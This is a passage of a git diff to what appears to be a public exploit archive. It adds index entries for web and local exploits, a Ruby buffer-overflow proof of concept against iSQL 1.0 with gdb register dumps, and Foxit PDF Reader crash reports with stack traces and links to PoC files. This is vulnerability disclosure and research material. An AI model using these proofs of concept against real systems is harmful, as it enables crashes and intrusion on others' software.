diff --git a/files.csv b/files.csv index cc0b8457b..342d3dd26 100755 --- a/files.csv +++ b/files.csv @@ -36109,3 +36109,17 @@ id,file,description,date,author,platform,type,port 39928,platforms/osx/dos/39928.c,"OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 39929,platforms/multiple/dos/39929.c,"OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 +39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80 +39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 +39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0 +39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 +39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 +39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 +39937,platforms/php/webapps/39937.py,"Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80 +39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0 +39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow PoC",2016-06-13,HaHwul,linux,dos,0 +39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 +39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0 +39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0 +39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 +39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 diff --git a/platforms/linux/dos/39939.rb b/platforms/linux/dos/39939.rb new file mode 100755 index 000000000..b260b95d1 --- /dev/null +++ b/platforms/linux/dos/39939.rb @@ -0,0 +1,64 @@ +#!/bin/ruby +# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c) +# Date: 2016-06-13 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/roselone/iSQL +# Software Link: https://github.com/roselone/iSQL/archive/master.zip +# Version: 1.0 +# Tested on: Debian [wheezy] +# CVE : none +=begin +### Vulnerability Point + :: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable + :: don't check str size +446 char *get_MD5(char *str){ +447 FILE *stream; +448 char *buf=malloc(sizeof(char)*33); +449 char cmd[100]; +450 memset(buf,'\0',sizeof(buf)); +451 memset(cmd,'\0',sizeof(cmd)); +452 strcpy(cmd,"echo "); //5 +453 strcpy((char *)cmd+5,str); + +Edit makefile > CFLAGS = -fno-stack-protector +#> make + +### gdb history +(gdb) r +Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql + +*************** welcome to ISQL **************** +* version 1.0 * +* Designed by RL * +* Copyright (c) 2011, RL. All rights reserved * +************************************************ + +>username: hwul_test +>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800) +Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 () + +(gdb) x/s $rax +0x4141414141414141: + +(gdb) x/s $rbp +0x4141414141414141: + +### Registers +(gdb) i r +rax 0x4141414141414141 4702111234474983745 +rbx 0x0 0 +rcx 0x7ffff7b06480 140737348920448 +rdx 0x0 0 +rsi 0x60b610 6338064 +rdi 0x5 5 +rbp 0x4141414141414141 0x4141414141414141 +rsp 0x7fffffffe948 0x7fffffffe948 +r8 0xffffffff 4294967295 +r9 0x0 +=end +puts "iSQL 1.0 - Buffer Overflow" +puts " - by hahwul" +puts " - Run BUG.." +buffer = "A"*800 +system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql") diff --git a/platforms/linux/dos/39940.txt b/platforms/linux/dos/39940.txt new file mode 100755 index 000000000..1f330bbd1 --- /dev/null +++ b/platforms/linux/dos/39940.txt @@ -0,0 +1,105 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741 + +We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 *** +[New Thread 0x7fffdfa16700 (LWP 26721)] +[New Thread 0x7fffe0217700 (LWP 26720)] +[New Thread 0x7fffe0a18700 (LWP 26718)] +[New Thread 0x7fffe97cd700 (LWP 26717)] + +Program received signal SIGABRT, Aborted. +0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 +56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. +(gdb) where +#0 0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff4fc40a8 in __GI_abort () at abort.c:89 +#2 0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1, + fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff500bef6 in malloc_printerr (ptr=, + str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996 +#4 free_check (mem=, caller=) at hooks.c:298 +#5 0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() () +#6 0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) () +#7 0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) () +#8 0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0) + at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792 +#9 0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0) + at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23 +#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#49 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310 +--- cut --- + +Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39940.zip + diff --git a/platforms/linux/dos/39941.txt b/platforms/linux/dos/39941.txt new file mode 100755 index 000000000..d80b74c55 --- /dev/null +++ b/platforms/linux/dos/39941.txt @@ -0,0 +1,113 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744 + +We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const () +(gdb) where +#0 0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const + () +#1 0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const () +#2 0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const () +#3 0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() () +#4 0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#5 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#6 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#7 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#8 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() () +#9 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) () +#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) () +#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) () +#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) () +#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) () +#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#53 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310 +(gdb) x/10i $rip +=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>: mov 0x2(%rbp),%dl + 0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>: add $0x3,%r13 + 0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>: add $0x3,%rbp + 0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>: inc %eax + 0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>: mov %dl,-0x3(%r13) + 0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>: mov -0x2(%rbp),%dl + 0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>: mov %dl,-0x2(%r13) + 0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>: mov -0x3(%rbp),%dl + 0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>: mov %dl,-0x1(%r13) + 0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>: + jmp 0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179> +(gdb) info reg $rbp +rbp 0x1a30fff 0x1a30fff +--- cut --- + +Attached is a proof of concept PDF file. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39941.zip + diff --git a/platforms/linux/dos/39942.txt b/platforms/linux/dos/39942.txt new file mode 100755 index 000000000..1236ce25b --- /dev/null +++ b/platforms/linux/dos/39942.txt @@ -0,0 +1,119 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745 + +We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) () +(gdb) where +#0 0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) () +#1 0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) () +#2 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) () +#3 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) () +#4 0x00000000006c6364 in CRichTextXML::ParseXML2Text() () +#5 0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) () +#6 0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) () +#7 0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) () +#8 0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) () +#9 0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) () +#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) () +#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) () +#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) () +#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) () +#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) () +#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) () +#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901 +#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670) + at ../../Readerlite/ReaderLite/src/preview.cpp:3204 +x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180) + at ../../Readerlite/ReaderLite/src/preview.cpp:1443 +#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520) + at ../../Readerlite/ReaderLite/src/preview.cpp:2386 +#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() () +#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180) + at 